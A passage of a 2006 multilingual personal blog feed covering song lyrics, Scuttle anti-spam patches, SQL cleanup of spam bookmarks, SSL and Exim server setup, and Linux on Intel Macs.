  8681. Que tous les jours faut se lever&#8230;</p>
  8683. <p>(Glardon/<a href="" title="Melatonin musique (">Melatonin</a>)</p>
  8686. <p>Cette chanson d&#233;crit pas mal les trois semaines que je viens de passer &#224; l'arm&#233;e<br>
  8687. </p>
  8689. ]]></description>
  8690.    <content:encoded><![CDATA[<p>Je me rapelle ces cellules vides<br>
  8691. Tout petits bouts de vie sordides<br>
  8692. Je passe ma journ&#233;e &#224; attendre<br>
  8693. Que quelqu'un tente de la comprendre<br>
  8694. Il vaut mieux apprendre &#224; mentir<br>
  8695. Se supporter tant mal que pire<br>
  8696. Mieux vaut apprendre &#224; oublier<br>
  8697. Que tous les jours faut se lever<br>
  8698. Trouver la force d'y croire encore<br>
  8699. Quand tout notre corps hurle &quot;assez&quot;<br>
  8700. Sourire &#224; des gens inconnus<br>
  8701. Quand ceux qu'on aime ne sourient plus<br>
  8702. Dans la galerie de nos amours perdues<br>
  8703. Se souvenir que l'on n'est rien<br>
  8704. Qu'un paranth&#232;se dans le destin<br>
  8705. Sous-particule du genre humain<br>
  8706. Et ces journ&#233;es sont toutes les m&#234;mes<br>
  8707. Avec nos peurs et nos &quot;je t'aime&quot;<br>
  8708. Avec cette solitude am&#232;re<br>
  8709. On vit &#8211; on meurt et on esp&#232;re<br>
  8710. Une derni&#232;re lettre abandon&#233;e<br>
  8711. Du rouge &#224; l&#232;vres sur un caf&#233;<br>
  8712. N'importe quoi pour oublier<br>
  8713. Que tous les jours faut se lever&#8230;</p>
  8715. <p>(Glardon/<a href="" title="Melatonin musique (">Melatonin</a>)</p>
  8718. <p>Cette chanson d&#233;crit pas mal les trois semaines que je viens de passer &#224; l'arm&#233;e<br>
  8719. </p>
  8721. ]]></content:encoded>
  8722.  </item>
  8724.  <item>
  8725.    <title>Samstag ist Patchtag</title>
  8726.    <link></link>
  8727.    <guid isPermaLink="true"></guid>
  8728.    <dc:creator>Andreas Jaggi</dc:creator>
  8729.    <creativeCommons:license></creativeCommons:license>
  8730.    <pubDate>Sat, 19 Aug 2006 15:04:57 +0200</pubDate>
  8731.    <category domain="">Coding</category>
  8732.    <description><![CDATA[<p>Heute jedenfalls: um meine <a href="">Linksammlung</a> in Zukunft besser vor Spammern zu schützen, habe ich <a href="">Scuttle</a> ein bisschen erweitert:</p>
  8734. <ul>
  8735. <li>Zuerst wurde eine E-Mail-Benachrichtigung eingebaut, wenn sich ein neuer User registriert. So können Spammer nicht mehr tagelang unbemerkt ihr Unwesen treiben. &#8594;&nbsp;<a href="">scuttle-email-notification.diff</a></li>
  8737. <li>Dann habe ich einen Filter eingebaut, damit sich Spammer nicht mehr mit freexxx, pornlinks oder texaspoker registrieren können. &#8594;&nbsp;<a href="">scuttle-reasonableusernames.diff</a></li>
  8739. <li>Und zum Schluss gibt's noch einen Adminbereich wo Spammer bequem ausgewählt und mitsammt ihrer Links und Tags gelöscht werden können. &#8594;&nbsp;<a href="">scuttle-admin.diff</a></li>
  8740. </ul>
  8741. <p>Um den Adminbereich nutzen zu können muss in der Datenbank noch ein Feld <code>uAdmin</code> vom Typ <code>TINYINT(1)</code> zur Tabelle <code>sc_users</code> hinzugefügt werden. Danach dieses einfach auf <code>1</code> setzen um einen Benutzer zum Administrator zu machen.</p>
  8743. ]]></description>
  8744.    <content:encoded><![CDATA[<p>Heute jedenfalls: um meine <a href="">Linksammlung</a> in Zukunft besser vor Spammern zu schützen, habe ich <a href="">Scuttle</a> ein bisschen erweitert:</p>
  8746. <ul>
  8747. <li>Zuerst wurde eine E-Mail-Benachrichtigung eingebaut, wenn sich ein neuer User registriert. So können Spammer nicht mehr tagelang unbemerkt ihr Unwesen treiben. &#8594;&nbsp;<a href="">scuttle-email-notification.diff</a></li>
  8749. <li>Dann habe ich einen Filter eingebaut, damit sich Spammer nicht mehr mit freexxx, pornlinks oder texaspoker registrieren können. &#8594;&nbsp;<a href="">scuttle-reasonableusernames.diff</a></li>
  8751. <li>Und zum Schluss gibt's noch einen Adminbereich wo Spammer bequem ausgewählt und mitsammt ihrer Links und Tags gelöscht werden können. &#8594;&nbsp;<a href="">scuttle-admin.diff</a></li>
  8752. </ul>
  8753. <p>Um den Adminbereich nutzen zu können muss in der Datenbank noch ein Feld <code>uAdmin</code> vom Typ <code>TINYINT(1)</code> zur Tabelle <code>sc_users</code> hinzugefügt werden. Danach dieses einfach auf <code>1</code> setzen um einen Benutzer zum Administrator zu machen.</p>
  8755. ]]></content:encoded>
  8756.  </item>
  8758.  <item>
  8759.    <title>Setting up an SSL server with Apache2</title>
  8760.    <link></link>
  8761.    <guid isPermaLink="true"></guid>
  8762.    <dc:creator>Andreas Jaggi</dc:creator>
  8763.    <creativeCommons:license></creativeCommons:license>
  8764.    <pubDate>Fri, 18 Aug 2006 18:25:21 +0200</pubDate>
  8765.    <category domain="">Linux</category>
  8766.    <description><![CDATA[<p>Thanks to <a href="" title="Debian Administration :: Setting up an SSL server with Apache2">this</a> (really simple) tutorial from <a href="" title="Debian Administration"></a> I managed to enable SSL on my server. Thus <a href="" title=""></a> is available via HTTPS.</p>
  8767. <p>
  8768. If you run a server without SSL, please take two minutes and enable it.<br>Your users will be thankfull for their protected privacy.</p>
  8769. ]]></description>
  8770.    <content:encoded><![CDATA[<p>Thanks to <a href="" title="Debian Administration :: Setting up an SSL server with Apache2">this</a> (really simple) tutorial from <a href="" title="Debian Administration"></a> I managed to enable SSL on my server. Thus <a href="" title=""></a> is available via HTTPS.</p>
  8771. <p>
  8772. If you run a server without SSL, please take two minutes and enable it.<br>Your users will be thankfull for their protected privacy.</p>
  8773. ]]></content:encoded>
  8774.  </item>
  8776.  <item>
  8777.    <title>Weg mit dem Spam</title>
  8778.    <link></link>
  8779.    <guid isPermaLink="true"></guid>
  8780.    <dc:creator>Andreas Jaggi</dc:creator>
  8781.    <creativeCommons:license></creativeCommons:license>
  8782.    <pubDate>Thu, 17 Aug 2006 16:50:46 +0200</pubDate>
  8783.    <category domain="">Misc</category>
  8784.    <description><![CDATA[<p>Heute wurde meine mit <a href="" title="">Scuttle</a> funktionierende <a href="" title="">Linksammlung</a> von einem Spammer heimgesucht.<br>
  8785. Resultat: rund 10'000 Spamlinks und etwa dreimal soviele Spamtags.</p>
  8787. <p>Glücklicherweise lässt sich das mit nur drei SQL Befehlen entfernen:</p>
  8789. <ol>
  8790. <li>
  8791. <p><var>spammer-uId</var> ausfindig machen und entsprechenden User löschen</p>
  8792. <code>DELET FROM sc_users WHERE uID = <var>spammer-uId</var></code></li>
  8794. <li>
  8795. <p>Spamtags löschen</p>
  8796. <code>
  8797. DELETE FROM sc_tags WHERE bId IN (SELECT bId FROM sc_bookmarks WHERE uId = <var>spammer-uId</var>)
  8798. </code>
  8799. </li>
  8801. <li>
  8802. <p>Spamlinks löschen</p>
  8803. <code> DELETE FROM sc_bookmarks WHERE uId = <var>spammer-uId</var></code>
  8804. </li>
  8805. </ol>
  8806. ]]></description>
  8807.    <content:encoded><![CDATA[<p>Heute wurde meine mit <a href="" title="">Scuttle</a> funktionierende <a href="" title="">Linksammlung</a> von einem Spammer heimgesucht.<br>
  8808. Resultat: rund 10'000 Spamlinks und etwa dreimal soviele Spamtags.</p>
  8810. <p>Glücklicherweise lässt sich das mit nur drei SQL Befehlen entfernen:</p>
  8812. <ol>
  8813. <li>
  8814. <p><var>spammer-uId</var> ausfindig machen und entsprechenden User löschen</p>
  8815. <code>DELET FROM sc_users WHERE uID = <var>spammer-uId</var></code></li>
  8817. <li>
  8818. <p>Spamtags löschen</p>
  8819. <code>
  8820. DELETE FROM sc_tags WHERE bId IN (SELECT bId FROM sc_bookmarks WHERE uId = <var>spammer-uId</var>)
  8821. </code>
  8822. </li>
  8824. <li>
  8825. <p>Spamlinks löschen</p>
  8826. <code> DELETE FROM sc_bookmarks WHERE uId = <var>spammer-uId</var></code>
  8827. </li>
  8828. </ol>
  8829. ]]></content:encoded>
  8830.  </item>
  8832.  <item>
  8833.    <title>Bachelor</title>
  8834.    <link></link>
  8835.    <guid isPermaLink="true"></guid>
  8836.    <dc:creator>Andreas Jaggi</dc:creator>
  8837.    <creativeCommons:license></creativeCommons:license>
  8838.    <pubDate>Wed, 16 Aug 2006 11:56:00 +0200</pubDate>
  8839.    <category domain="">Misc</category>
  8840.    <description><![CDATA[<blockquote><p>Vu ces r&#233;sultats, le Bachelor of Science BSc en informatique lui est d&#233;cern&#233;.<br>
  8841. In consideration of these results the candidate is awarded the &quot;Bachelor of Science BSc in Computer Science&quot;</p></blockquote>
  8842. ]]></description>
  8843.    <content:encoded><![CDATA[<blockquote><p>Vu ces r&#233;sultats, le Bachelor of Science BSc en informatique lui est d&#233;cern&#233;.<br>
  8844. In consideration of these results the candidate is awarded the &quot;Bachelor of Science BSc in Computer Science&quot;</p></blockquote>
  8845. ]]></content:encoded>
  8846.  </item>
  8848.  <item>
  8849.    <title>httphead.c</title>
  8850.    <link></link>
  8851.    <guid isPermaLink="true"></guid>
  8852.    <dc:creator>Andreas Jaggi</dc:creator>
  8853.    <creativeCommons:license></creativeCommons:license>
  8854.    <pubDate>Sun, 13 Aug 2006 15:40:34 +0200</pubDate>
  8855.    <category domain="">Coding</category>
  8856.    <description><![CDATA[<p>Da es mir gestern Abend etwas langweilig war, habe ich mich ein bisschen im C Programmieren geübt, schliesslich sollte ich darin fit sein wenn ich im Herbst mein <a href="" title="LSIR Project - Programming world's smallest computer ">Semesterprojekt</a> beginne.</p>
  8857. <p>Dabei ist ein kleines Programm entstanden, das den HTTP-Header einer Website ausgibt: <a href="" title="httphead.c">httphead.c</a></p>
  8858. ]]></description>
  8859.    <content:encoded><![CDATA[<p>Da es mir gestern Abend etwas langweilig war, habe ich mich ein bisschen im C Programmieren geübt, schliesslich sollte ich darin fit sein wenn ich im Herbst mein <a href="" title="LSIR Project - Programming world's smallest computer ">Semesterprojekt</a> beginne.</p>
  8860. <p>Dabei ist ein kleines Programm entstanden, das den HTTP-Header einer Website ausgibt: <a href="" title="httphead.c">httphead.c</a></p>
  8861. ]]></content:encoded>
  8862.  </item>
  8864.  <item>
  8865.    <title>No more trackback (spam)</title>
  8866.    <link></link>
  8867.    <guid isPermaLink="true"></guid>
  8868.    <dc:creator>Andreas Jaggi</dc:creator>
  8869.    <creativeCommons:license></creativeCommons:license>
  8870.    <pubDate>Sun, 13 Aug 2006 15:20:21 +0200</pubDate>
  8871.    <category domain="">Misc</category>
  8872.    <description><![CDATA[<p>Gestern wurde mir mitgeteilt, dass mein trackback.php Script den Server zum Absturz gebracht hat!<br>
  8873. Das erstaunt mich nicht besonders, da ich hier in letzter Zeit immer stärker mit Trackback-Spam bombardiert werde und der schützende Bayesian Spam-Filter nicht gerade sehr ressourcenschonend arbeitet.</p>
  8874. <p>Also gibt's ab jetzt hier keine Trackback-Unterstützung mehr. Aufrufe von trackback.php werden mit 410 oder 403 beantwortet!</p>
  8875. ]]></description>
  8876.    <content:encoded><![CDATA[<p>Gestern wurde mir mitgeteilt, dass mein trackback.php Script den Server zum Absturz gebracht hat!<br>
  8877. Das erstaunt mich nicht besonders, da ich hier in letzter Zeit immer stärker mit Trackback-Spam bombardiert werde und der schützende Bayesian Spam-Filter nicht gerade sehr ressourcenschonend arbeitet.</p>
  8878. <p>Also gibt's ab jetzt hier keine Trackback-Unterstützung mehr. Aufrufe von trackback.php werden mit 410 oder 403 beantwortet!</p>
  8879. ]]></content:encoded>
  8880.  </item>
  8882.  <item>
  8883.    <title>Länder Stöckchen</title>
  8884.    <link></link>
  8885.    <guid isPermaLink="true"></guid>
  8886.    <dc:creator>Andreas Jaggi</dc:creator>
  8887.    <creativeCommons:license></creativeCommons:license>
  8888.    <pubDate>Sun, 02 Jul 2006 16:57:54 +0200</pubDate>
  8889.    <category domain="">Misc</category>
  8890.    <description><![CDATA[<p>
  8891. <a href="" title="countrymap">
  8892. <img width="400" height="250" src="" alt="worldmap">
  8893. </a>
  8894. </p>
  8896. <p>
  8897. Eigentlich sollte ich ja für die Prüfungen lernen und nicht vor dem Computer sitzen. Aber wenn die Motivation nicht da ist kann man nichts machen ;-)<br>
  8898. Und dann wirft mir <a href="" title="deep-resonance">Markus</a> auch noch ein Stöckchen zu. Danke, noch eine Ausrede mehr um mich vom Lernen abzuhalten :-)
  8899. </p>
  8900. <p>
  8901. Wie man sieht bin ich als Student noch nicht so viel in der Welt rumgekommen.<br>
  8902. Das Stöckchen gebe ich an <a href="" title="RWo 2k5 :: Weblog (">Robert</a>, <a href="" title="The Boltzmann Constant (">Gordon</a> und <a href="" title=" blog (">Marc</a> weiter.<br>Die Karten kann man sich bei <a href="" title="My World66 ("></a> generieren lassen.<br>Voil&#224;!</p>
  8904. ]]></description>
  8905.    <content:encoded><![CDATA[<p>
  8906. <a href="" title="countrymap">
  8907. <img width="400" height="250" src="" alt="worldmap">
  8908. </a>
  8909. </p>
  8911. <p>
  8912. Eigentlich sollte ich ja für die Prüfungen lernen und nicht vor dem Computer sitzen. Aber wenn die Motivation nicht da ist kann man nichts machen ;-)<br>
  8913. Und dann wirft mir <a href="" title="deep-resonance">Markus</a> auch noch ein Stöckchen zu. Danke, noch eine Ausrede mehr um mich vom Lernen abzuhalten :-)
  8914. </p>
  8915. <p>
  8916. Wie man sieht bin ich als Student noch nicht so viel in der Welt rumgekommen.<br>
  8917. Das Stöckchen gebe ich an <a href="" title="RWo 2k5 :: Weblog (">Robert</a>, <a href="" title="The Boltzmann Constant (">Gordon</a> und <a href="" title=" blog (">Marc</a> weiter.<br>Die Karten kann man sich bei <a href="" title="My World66 ("></a> generieren lassen.<br>Voil&#224;!</p>
  8919. ]]></content:encoded>
  8920.  </item>
  8922.  <item>
  8923.    <title>Four rings</title>
  8924.    <link></link>
  8925.    <guid isPermaLink="true"></guid>
  8926.    <dc:creator>Andreas Jaggi</dc:creator>
  8927.    <creativeCommons:license></creativeCommons:license>
  8928.    <pubDate>Sun, 02 Jul 2006 15:39:15 +0200</pubDate>
  8929.    <category domain="">Misc</category>
  8930.    <description><![CDATA[<p><img width="318" height="253" src="" alt="Four rings"></p>
  8932. <p>Via <a href="" title="EDV - Ende der Vernunft">EDV</a>.</p>
  8934. ]]></description>
  8935.    <content:encoded><![CDATA[<p><img width="318" height="253" src="" alt="Four rings"></p>
  8937. <p>Via <a href="" title="EDV - Ende der Vernunft">EDV</a>.</p>
  8939. ]]></content:encoded>
  8940.  </item>
  8942.  <item>
  8943.    <title>Back in Black</title>
  8944.    <link></link>
  8945.    <guid isPermaLink="true"></guid>
  8946.    <dc:creator>Andreas Jaggi</dc:creator>
  8947.    <creativeCommons:license></creativeCommons:license>
  8948.    <pubDate>Sun, 25 Jun 2006 23:40:31 +0200</pubDate>
  8949.    <category domain="">Misc</category>
  8950.    <description><![CDATA[<p><a href="" title="Back in Black"><img src="" width="147" height="84" alt="Back in Black"></a></p>
  8951. ]]></description>
  8952.    <content:encoded><![CDATA[<p><a href="" title="Back in Black"><img src="" width="147" height="84" alt="Back in Black"></a></p>
  8953. ]]></content:encoded>
  8954.  </item>
  8956.  <item>
  8957.    <title>Configuring Exim4 and Courier IMAP under Debian GNU/Linux</title>
  8958.    <link></link>
  8959.    <guid isPermaLink="true"></guid>
  8960.    <dc:creator>Andreas Jaggi</dc:creator>
  8961.    <creativeCommons:license></creativeCommons:license>
  8962.    <pubDate>Sun, 25 Jun 2006 21:18:46 +0200</pubDate>
  8963.    <category domain="">Linux</category>
  8964.    <description><![CDATA[<p>Today I finally installed a mail transfer agent/mail delivery agent on my server.</p>
  8965. <p>I quickly looked at the most popular applications for such a job (<a href="" title="exim Internet Mailer">Exim</a>, <a href="" title="The Postfix Home Page">Postfix</a> and <a href="" title="qmail: Second most popular MTA on the internet">qmail</a>) and choosed Exim 4 (especially because it's the only one which is 'real' opensource).</p>
  8966. <p>Then I searched a Howto or tutorial on Google, but most results were not really useful. For example the <a href="" title="Exim 4 Howto (">Exim 4 Howto</a> from like many others disappointed me a bit since they don't give any advice on configuring Exim. But after some evolution and mutation of the search string I finally found a very good guide.</p>
  8967. <p><a href="" title="Configuring Exim4 and Courier IMAP under Debian GNU/Linux (">Configuring Exim4 and Courier IMAP under Debian GNU/Linux</a> from <a href="" title="Jasons's Web Thingy (">Jason Boxman</a> helped me to set up Exim step by step. Not also he explains how to install Exim but he also shows how to interact with Courier IMAP and how to secure all transfers with SSL.</p>
  8968. <p>I can only recommend you this guide if you want to install Exim 4 on a Debian system.</p>
  8969. ]]></description>
  8970.    <content:encoded><![CDATA[<p>Today I finally installed a mail transfer agent/mail delivery agent on my server.</p>
  8971. <p>I quickly looked at the most popular applications for such a job (<a href="" title="exim Internet Mailer">Exim</a>, <a href="" title="The Postfix Home Page">Postfix</a> and <a href="" title="qmail: Second most popular MTA on the internet">qmail</a>) and choosed Exim 4 (especially because it's the only one which is 'real' opensource).</p>
  8972. <p>Then I searched a Howto or tutorial on Google, but most results were not really useful. For example the <a href="" title="Exim 4 Howto (">Exim 4 Howto</a> from like many others disappointed me a bit since they don't give any advice on configuring Exim. But after some evolution and mutation of the search string I finally found a very good guide.</p>
  8973. <p><a href="" title="Configuring Exim4 and Courier IMAP under Debian GNU/Linux (">Configuring Exim4 and Courier IMAP under Debian GNU/Linux</a> from <a href="" title="Jasons's Web Thingy (">Jason Boxman</a> helped me to set up Exim step by step. Not also he explains how to install Exim but he also shows how to interact with Courier IMAP and how to secure all transfers with SSL.</p>
  8974. <p>I can only recommend you this guide if you want to install Exim 4 on a Debian system.</p>
  8975. ]]></content:encoded>
  8976.  </item>
  8978.  <item>
  8979.    <title>Lordi Rules</title>
  8980.    <link></link>
  8981.    <guid isPermaLink="true"></guid>
  8982.    <dc:creator>Andreas Jaggi</dc:creator>
  8983.    <creativeCommons:license></creativeCommons:license>
  8984.    <pubDate>Thu, 25 May 2006 19:13:01 +0200</pubDate>
  8985.    <category domain="">Misc</category>
  8986.    <description><![CDATA[It seems that <a href="" title="Linus Torvalds - Wikipedia">Linus Torvalds</a> also followed the <a href="" title="Eurovision Song Contest">Eurovision Song Contest</a>. He called the new (fifth) release candidate of Linux 2.6.17 &quot;<a href="" title="LORDI">Lordi</a> Rules&quot; which replaces the old name &quot;Sliding Snow Leopard&quot;. (via <a href=";a=commitdiff;h=a8bd60705aa17a998516837d9c1e503ad4cbd7fc;hp=4f3a151a11da3351e2149a401d4ee18426938de7" title="git - linux/kernel/git/torvalds/linux-2.6.git/commitdiff">git commit</a>)<br>
  8987. ]]></description>
  8988.    <content:encoded><![CDATA[It seems that <a href="" title="Linus Torvalds - Wikipedia">Linus Torvalds</a> also followed the <a href="" title="Eurovision Song Contest">Eurovision Song Contest</a>. He called the new (fifth) release candidate of Linux 2.6.17 &quot;<a href="" title="LORDI">Lordi</a> Rules&quot; which replaces the old name &quot;Sliding Snow Leopard&quot;. (via <a href=";a=commitdiff;h=a8bd60705aa17a998516837d9c1e503ad4cbd7fc;hp=4f3a151a11da3351e2149a401d4ee18426938de7" title="git - linux/kernel/git/torvalds/linux-2.6.git/commitdiff">git commit</a>)<br>
  8989. ]]></content:encoded>
  8990.  </item>
  8992.  <item>
  8993.    <title>Scriptaculous Cheat Sheet</title>
  8994.    <link></link>
  8995.    <guid isPermaLink="true"></guid>
  8996.    <dc:creator>Andreas Jaggi</dc:creator>
  8997.    <creativeCommons:license></creativeCommons:license>
  8998.    <pubDate>Mon, 24 Apr 2006 10:06:56 +0200</pubDate>
  8999.    <category domain="">Webdesign</category>
  9000.    <description><![CDATA[<p><a href="" title="(24)slash7">Amy Hoy</a> has released a nice <a href="" title="Scriptaculous Cheat Sheet #1">Scriptaculous Cheat Sheet</a> just at the right moment since I'm going to use <a href="" title=" - web 2.0 javascript">Scriptaculous</a> for the redesign of <a href="" title="News :: Media &amp; Communication"></a>.</p>
  9001. ]]></description>
  9002.    <content:encoded><![CDATA[<p><a href="" title="(24)slash7">Amy Hoy</a> has released a nice <a href="" title="Scriptaculous Cheat Sheet #1">Scriptaculous Cheat Sheet</a> just at the right moment since I'm going to use <a href="" title=" - web 2.0 javascript">Scriptaculous</a> for the redesign of <a href="" title="News :: Media &amp; Communication"></a>.</p>
  9003. ]]></content:encoded>
  9004.  </item>
  9006.  <item>
  9007.    <title>Fünf Fragen über Internet und Musik</title>
  9008.    <link></link>
  9009.    <guid isPermaLink="true"></guid>
  9010.    <dc:creator>Andreas Jaggi</dc:creator>
  9011.    <creativeCommons:license></creativeCommons:license>
  9012.    <pubDate>Sat, 18 Feb 2006 12:04:50 +0100</pubDate>
  9013.    <category domain="">Music</category>
  9014.    <description><![CDATA[<p>Und wieder eine Ausgabe <a href="" title="Internet und Musik (die freitäglichen fünf) (">der freitäglichen fünf</a>, diesmal zum Thema Musik und Internet.</p>
  9016. <ol>
  9017. <li>
  9018. <p><q>Nutzt du kostenpflichtige Angebote zum Musikdownload? Wenn ja,
  9019. welche und wenn nicht, warum nicht? Nutzt du kostenfreie (legale)
  9020. Angebote?</q></p>
  9022. <p>Nein, ich nutze weder einen kostenplichtigen noch einen kostenlosen
  9023. Musikdownload-Service. Meistens kaufe ich CDs direkt an einem Konzert
  9024. oder ich bestelle sie bei</p>
  9025. </li>
  9027. <li>
  9028. <p><q>Spielst du ein Instrument?</q></p>
  9030. <p>Aktuell nicht mehr, aber früher habe ich Schlagzeug gespielt.</p>
  9031. </li>
  9033. <li>
  9034. <p><q>Wie hat sich dein Musikgeschmack entwickelt? Haben Musikangebote aus dem Internet evtl. Einflu&#223; auf diese Entwicklung?</q></p>
  9036. <p>Bedingt durch mein Studium in Lausanne, hat mein Musikgeschmack in letzter Zeit etwas einen französischen Touch erhalten.<br>
  9037. Musikangebote aus dem Internet haben keinen Einfluss auf diese Entwicklung, hingegen die Konzerte im <a href="" title="Satellite - Bar, Concerts, Cafés-Théâtres">Satellite</a> schon eher :-)</p>
  9038. </li>
  9040. <li>
  9041. <p><q>Bist Du mit der derzeitigen Gesetzgebung zum Thema Privatkopien vertraut?</q></p>
  9043. <p>Ja.</p>
  9044. </li>
  9046. <li>
  9047. <p><q>Deine Platten-, CD- oder MP3-Sammlung ist dein Schatz? Gibt es besondere Schmuckstücke?</q></p>
  9049. <p>Ein Schatz nicht direkt, aber ich verleihe meine CDs nicht gerne.<br>
  9050. Eigentliche Schmuckstücke oder richtige Raritäten besitze ich nicht,
  9051. aber diverse CDs sind signiert und mit einer Widmung versehen.</p>
  9052. </li>
  9053. </ol>
  9054. ]]></description>
  9055.    <content:encoded><![CDATA[<p>Und wieder eine Ausgabe <a href="" title="Internet und Musik (die freitäglichen fünf) (">der freitäglichen fünf</a>, diesmal zum Thema Musik und Internet.</p>
  9057. <ol>
  9058. <li>
  9059. <p><q>Nutzt du kostenpflichtige Angebote zum Musikdownload? Wenn ja,
  9060. welche und wenn nicht, warum nicht? Nutzt du kostenfreie (legale)
  9061. Angebote?</q></p>
  9063. <p>Nein, ich nutze weder einen kostenplichtigen noch einen kostenlosen
  9064. Musikdownload-Service. Meistens kaufe ich CDs direkt an einem Konzert
  9065. oder ich bestelle sie bei</p>
  9066. </li>
  9068. <li>
  9069. <p><q>Spielst du ein Instrument?</q></p>
  9071. <p>Aktuell nicht mehr, aber früher habe ich Schlagzeug gespielt.</p>
  9072. </li>
  9074. <li>
  9075. <p><q>Wie hat sich dein Musikgeschmack entwickelt? Haben Musikangebote aus dem Internet evtl. Einflu&#223; auf diese Entwicklung?</q></p>
  9077. <p>Bedingt durch mein Studium in Lausanne, hat mein Musikgeschmack in letzter Zeit etwas einen französischen Touch erhalten.<br>
  9078. Musikangebote aus dem Internet haben keinen Einfluss auf diese Entwicklung, hingegen die Konzerte im <a href="" title="Satellite - Bar, Concerts, Cafés-Théâtres">Satellite</a> schon eher :-)</p>
  9079. </li>
  9081. <li>
  9082. <p><q>Bist Du mit der derzeitigen Gesetzgebung zum Thema Privatkopien vertraut?</q></p>
  9084. <p>Ja.</p>
  9085. </li>
  9087. <li>
  9088. <p><q>Deine Platten-, CD- oder MP3-Sammlung ist dein Schatz? Gibt es besondere Schmuckstücke?</q></p>
  9090. <p>Ein Schatz nicht direkt, aber ich verleihe meine CDs nicht gerne.<br>
  9091. Eigentliche Schmuckstücke oder richtige Raritäten besitze ich nicht,
  9092. aber diverse CDs sind signiert und mit einer Widmung versehen.</p>
  9093. </li>
  9094. </ol>
  9095. ]]></content:encoded>
  9096.  </item>
  9098.  <item>
  9099.    <title>Mactel-Linux</title>
  9100.    <link></link>
  9101.    <guid isPermaLink="true"></guid>
  9102.    <dc:creator>Andreas Jaggi</dc:creator>
  9103.    <creativeCommons:license></creativeCommons:license>
  9104.    <pubDate>Fri, 17 Feb 2006 09:57:58 +0100</pubDate>
  9105.    <category domain="">Linux</category>
  9106.    <description><![CDATA[<p>Linux wurde erfolgreich auf dem Intel-iMac gebootet! :-)
  9107. </p>
  9109. <p>
  9110. Mit Hilfe des EFI Linux Bootloaders <a href="" title="elilo">elilo</a>, eines modifizierten Kernels und eines gehackten Vesa-Framebuffer Treibers ist es dem <a href="" title="Xbox-Linux">Xbox-Linux</a> Entwickler Edgar Hucek aka <a href="" title="Mactel-Linux User:Gimli">gimli</a> gelungen den Linux Kernel und anschliessend auch <a href="" title="Gentoo Linux">Gentoo Linux</a> auf einem 17-Zoll iMac mit Intel Core Duo Prozessor zum Laufen zu bringen.</p>
  9112. <p>Im <a href="" title="Mactel-Linux">Mactel-Linux Wiki</a> finden sich schon ein paar <a href="" title="Screenshots - Mactel-Linux">Screenshots</a> sowie die Ausgaben von <a href="" title="dmesg - Mactel-Linux">dmesg</a> und <a href="" title="lspci - Mactel-Linux">lspci</a>.<br>
  9113. Momentan konnte die graphische Oberfläche (aka X) noch nicht zum Starten gebracht werden. Anhand der Zeile
  9114. </p>
  9116. <pre>01:00.0 VGA compatible controller: ATI Technologies Inc Unknown device 71c5</pre>
  9117. <p>
  9118. in der Ausgabe von lspci vermute ich, dass die ATI Graphikkarte nicht
  9119. erkannt/unterstützt wird und deshalb X noch nicht gestartet werden
  9120. kann. Aber wie vom Entwickler gesagt, ist Mactel-Linux vorerst nur ein
  9121. grosser Hack, und es wird noch etwas Zeit benötigen bis Linux stabil
  9122. auf den Intel Macs läuft.</p>
  9124. <p>Bei der Namenswahl hätten sich die Entwickler von mir aus lieber
  9125. etwas anderes einfallen lassen können. 'Mactel' assoziere ich mit
  9126. Telefon und nicht mit Computer. Aber daran werde ich mich wohl gewöhnen
  9127. müssen, genauso wie an das unmögliche 'MacBook Pro'.</p>
  9129. <p>via <a href="" title=""></a></p>
  9131. <p><b>Update 18.02.06:</b></p>
  9132. <p>Mittlerweile existiert auch ein <a href="" title="HOWTO - Mactel-Linux">HOWTO</a> und eine <a href="" title="EFI Memory Map from kernel">Memory Map des EFI</a>. Der gehackte Vesa-Framebuffer Treiber funktioniert bis jetzt aber ausschliesslich mit dem 17-Zoll iMac.</p>
  9133. ]]></description>
  9134.    <content:encoded><![CDATA[<p>Linux wurde erfolgreich auf dem Intel-iMac gebootet! :-)
  9135. </p>
  9137. <p>
  9138. Mit Hilfe des EFI Linux Bootloaders <a href="" title="elilo">elilo</a>, eines modifizierten Kernels und eines gehackten Vesa-Framebuffer Treibers ist es dem <a href="" title="Xbox-Linux">Xbox-Linux</a> Entwickler Edgar Hucek aka <a href="" title="Mactel-Linux User:Gimli">gimli</a> gelungen den Linux Kernel und anschliessend auch <a href="" title="Gentoo Linux">Gentoo Linux</a> auf einem 17-Zoll iMac mit Intel Core Duo Prozessor zum Laufen zu bringen.</p>
  9140. <p>Im <a href="" title="Mactel-Linux">Mactel-Linux Wiki</a> finden sich schon ein paar <a href="" title="Screenshots - Mactel-Linux">Screenshots</a> sowie die Ausgaben von <a href="" title="dmesg - Mactel-Linux">dmesg</a> und <a href="" title="lspci - Mactel-Linux">lspci</a>.<br>
  9141. Momentan konnte die graphische Oberfläche (aka X) noch nicht zum Starten gebracht werden. Anhand der Zeile
  9142. </p>
  9144. <pre>01:00.0 VGA compatible controller: ATI Technologies Inc Unknown device 71c5</pre>
  9145. <p>
  9146. in der Ausgabe von lspci vermute ich, dass die ATI Graphikkarte nicht
  9147. erkannt/unterstützt wird und deshalb X noch nicht gestartet werden
  9148. kann. Aber wie vom Entwickler gesagt, ist Mactel-Linux vorerst nur ein
  9149. grosser Hack, und es wird noch etwas Zeit benötigen bis Linux stabil
  9150. auf den Intel Macs läuft.</p>
  9152. <p>Bei der Namenswahl hätten sich die Entwickler von mir aus lieber
  9153. etwas anderes einfallen lassen können. 'Mactel' assoziere ich mit
  9154. Telefon und nicht mit Computer. Aber daran werde ich mich wohl gewöhnen
  9155. müssen, genauso wie an das unmögliche 'MacBook Pro'.</p>
  9157. <p>via <a href="" title=""></a></p>
  9159. <p><b>Update 18.02.06:</b></p>
  9160. <p>Mittlerweile existiert auch ein <a href="" title="HOWTO - Mactel-Linux">HOWTO</a> und eine <a href="" title="EFI Memory Map from kernel">Memory Map des EFI</a>. Der gehackte Vesa-Framebuffer Treiber funktioniert bis jetzt aber ausschliesslich mit dem 17-Zoll iMac.</p>
  9161. ]]></content:encoded>
  9162.  </item>
  9164.  <item>
  9165.    <title>Corréctions des exercices du génie logiciel</title>
  9166.    <link></link>
  9167.    <guid isPermaLink="true"></guid>
  9168.    <dc:creator>Andreas Jaggi</dc:creator>
  9169.    <creativeCommons:license></creativeCommons:license>
  9170.    <pubDate>Tue, 24 Jan 2006 22:35:31 +0100</pubDate>
  9171.    <category domain="">School</category>
  9172.    <description><![CDATA[<dl class="tdl">
  9173. <dt><a href=""><img src="" style="height: 75px; width: 100px;" alt="dsc01442_thumb.jpg"></a></dt>
  9174. <dd class="tdlb"></dd>
  9175. </dl>
